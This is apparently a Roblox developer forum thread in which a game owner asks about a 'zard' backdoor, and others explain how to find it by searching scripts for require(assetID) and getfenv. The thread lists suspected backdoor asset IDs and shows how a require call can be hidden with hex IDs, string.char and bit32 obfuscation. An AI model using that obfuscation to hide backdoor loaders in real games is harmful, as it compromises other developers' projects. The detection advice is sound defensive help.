Zard infection?

so like an exploiter joined my game and started ruining it. He was saying my game is infected with something called “zard” and that he needs studio access in order to remove it because my game keeps “flooding the logs” the thing is he seems awfully intent on getting studio access and not very annoying about his logs being flooded. Does anyone know anything about “zard” or how to fix infections?
(sidenote i have no how to categorize this so i put it under scripting support because i think its technically a script)

1 Like

I believe zard is a back door exploit, look for a require(then some numbers)
its server sided

you can remove it yourself dont give em access

oh i already know not to give access

  1. Give links to all your plugins, it might be from one of them.
  2. Check through all free models with scripts or module scripts for the following signs:
    require(number)
    getfenv()
    oddly formated scripts, usually all on one or 2 lines that are very long.

That’s kinda creepy. Just ignore em or ban em.
Search “Script” in the explorer and delete suspicious scripts.

I know as a fact zard uses require.

To add on to what others above are saying:

To search for text in all scripts in your game, go to View > Find All / Replace All and search for “require” and hit enter. Look for anything suspicious and you can probably ignore anything in CoreGui.

zard uses require(6972600074) i beleive

4698038381
or
343254562
or
359948692

2nd one is a backdoor i read comments on it i found the model for it

image

wait the second one??
that was from a model from EndorsedModel

That might be true, but I would not recommend doing a direct search like that normally because they could easily just obfuscate the asset ID to hide it from searches, for example:

require(0x19F996F0A)

would be the same as

require(6972600074)

Better to be safe and skim through all mentions of require if you know for a fact there is a backdoor virus somewhere in the game.

1 Like

might be first one then because last one is for adonis admin i think

everyone run ITS IN THE TREES!
but srsly the obfuscated version is in the trees

thanks for the help btw. I will not be sus of any scripts inside of trees
especially ones named “WELD.”

The scary thing is that my obfuscation example is also pretty basic. You can use some string.char wizardry to completely hide “require” from appearing in a search, but you have to use “getfenv”. You can also throw some binary manipulation in there by using the bit32 library:

--this black magic code:
getfenv()[string.char(114, 101, 113, 117, 105, 114, 101)](bit32.bor(bit32.lshift(0x9F99, 16), 0x6F0A)+0x100000000)

--is the same as this:
require(6972600074)

So also make sure to search for “getfenv” in Find All when looking for a virus backdoor script in your game, as well as “require”. There are ways to hide this stuff very deep in the trees :stuck_out_tongue:

1 Like

why have u sent this publicly
we are all doomed

1 Like